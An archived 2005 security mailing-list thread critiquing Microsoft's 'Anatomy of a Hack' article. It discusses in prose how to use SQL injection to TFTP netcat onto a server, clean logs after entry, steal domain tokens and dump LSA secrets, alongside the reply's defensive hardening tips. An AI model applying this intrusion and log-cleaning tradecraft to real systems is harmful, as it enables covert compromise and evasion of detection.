Re: Anatomy of a slightly better hack

[byte_jump <bytejump () gmail com>]

Hey, my screen doesn't have that cool red gradient for a background.
Does that mean I'm not a blackhat?

Note to self: It's probably not a good idea to have my domain
controllers and SQL servers reside on the same firewalled segment
(so-called DMZ) as my web servers.

> From the article:
"You can port scan an entire network in short order. Doing so on a
range of well-chosen ports can give you a tremendous amount of
information about what is available on the network."
[Scanning an entire network "in short order" usually means "whoops,
you got caught despite your mad hax0rz skillz".]

"As a last resort, you can always fire off an exploit against a system
and see what happens. This is often how vulnerability scanners look
for denial of service attacks. If the system still responds after the
attack it was most likely not vulnerable!"
[After being stealthy up to this point, is doing the above such a good
idea? :-) ]

"Let's assume I've done some initial probing and know that the target
network is fully patched and that there is a really tight firewall in
front...
Since I have a SQL injection vulnerability, I can use it to command
the database server to use TFTP to download netcat to the database
server."
[I thought we were assuming a tight firewall policy...]

I'll add some comments to this wonderful document:
1) You are a bloody friggin' idiot if you are using IIS as a public web server.
2) You are more of a bloody friggin' idiot if you are using IIS as a
public web server and not using URLscan.
3) When you implement a good web server on a solid environment (read:
grsecurity, PaX, ProPolice, etc.), _do not_ trust web application
developers. Use mod_security for crying out loud and filter anything
that isn't required for your app to run.
4) What are you doing allowing your web server to TFTP outbound
through the firewall?!
5) Didn't your CISSP bootcamp class teach you not to have your domain
controllers and SQL servers on the same segment as your web servers?
6) Can someone please explain to me why on earth LSAsecrets is
encrypted? What bloody use is it?

I've had enough. I'm off to write a Snort rule to detect "C:\warez"
and "EvilTrojan" before the blackhats get a hold of my servers.

Later.

On 7/6/05, Dave Aitel <dave () immunitysec com> wrote:
> This article, generically titled "Anatomy of a Hack" has been wandering
> around the net lately. I thought it'd be fun, as a group exersize, to
> improve on the material. Admittedly, the article is for beginners, but
> maybe we can change that?
>
> http://www.microsoft.com/technet/technetmag/issues/2005/01/AnatomyofaHack/default.aspx
>
> On thing I notice right away is that the article uses a lot of tools you
> pretty much have to guess at. What exactly does "DiscoverHosts" do? The
> figures show you the output - I assume you can download these tools on
> some MSDN CD or something.
>
> I notice he's using Windows to hack with - which is funny, because very
> few hackers actually use Windows as their desktop - there's no
> GRSecurity for Windows. :>
>
> In any case, it probably would be better if he had used the industry
> standard nmap to do his scanning, like every other article. NMap has
> that neat "resolve all the domain names asyncronously" thing.
>
> The bit about XSS (just below the SQL Injection bit) is oddly placed,
> considering there's no guarantee this is actually cross site scripting.
> It might or might not be, but we have no reason to think either way at
> this point.
>
> After that he uses xp_cmdshell('TFTP') to download netcat to his target,
> although it would have been a lot cooler if he'd used debug to write a
> little .com to do that for him. And netcat is so...1980's. These days
> you can get Hydrogen for free and have some real encryption, file
> uploading/downloading, for roughly the same size. You could probably
> upload it via a debug script without having to write a stage0
> downloader. Hacking without crypto is lame. I notice he creates a
> directory c:\warez, which is probably not optimal.
>
> One thing I notice about his dumpinfo tool is that it tells you all the
> wrong things. Your first job when on a new box is not to find out the
> users on the box - it's to find out if you were caught and clean up any
> logs. He needs to first look at the processes and see if anyone is
> logged on locally - a screen shot is useful for this. (I know, and you
> thought CANVAS's screenshot module was just for kicks and grins, didn't
> you?)  "Are people sitting here editing word documents or what?" I'm
> about to generate a lot of disk activity, and I don't want people to be
> like "wtf?"
>
> He does do a pretty good job with the shared service accounts gimmick,
> but he misses that domain tokens can be in all sorts of random processes
> - the web server is a good one. It's likely the domain admin has been
> admining his web server lately, and you can hop into that process to
> check to see if a token is sitting around for the taking.
>
> It's interesting how lucky he gets with LSADump. I never get lucky
> enough to see anything interesting. Is this true for everyone else too?
>
> Then he...mounts a drive. This is very non-covert. Mounting drives is
> very suspicious activity, even by windows admin standards. :>
>
> He decides to get logged and go through terminal services so he can do
> some "GUI hacking". I have no idea why he thinks this is a good idea,
> but I guess it makes for flashier screenshots.  Having Hydrogen instead
> of netcat would make using socketpipe unnecessary.
>
> I notice he's careful to avoid saying which password cracker he uses - I
> assume john the ripper or l0phtcrack.
>
> Anyways, just some thoughts. Back to haxing.
>
> -dave
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> _______________________________________________
> Dailydave mailing list
> Dailydave () lists immunitysec com
> https://lists.immunitysec.com/mailman/listinfo/dailydave
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
https://lists.immunitysec.com/mailman/listinfo/dailydave